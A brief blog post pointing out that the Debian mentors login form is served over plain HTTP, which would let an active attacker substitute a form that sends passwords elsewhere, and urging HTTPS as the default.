Taciturn

Transmitting passwords over HTTPS is safe, but serving the login form over HTTP is not. The attack vector is that an active attacker can send a custom login form with a different form submission address, compromising users' passwords.

I noticed this when using the Debian mentors login. Fortunately the login page is also available over HTTPS if you adjust the URI yourself, but ideally it would be the default.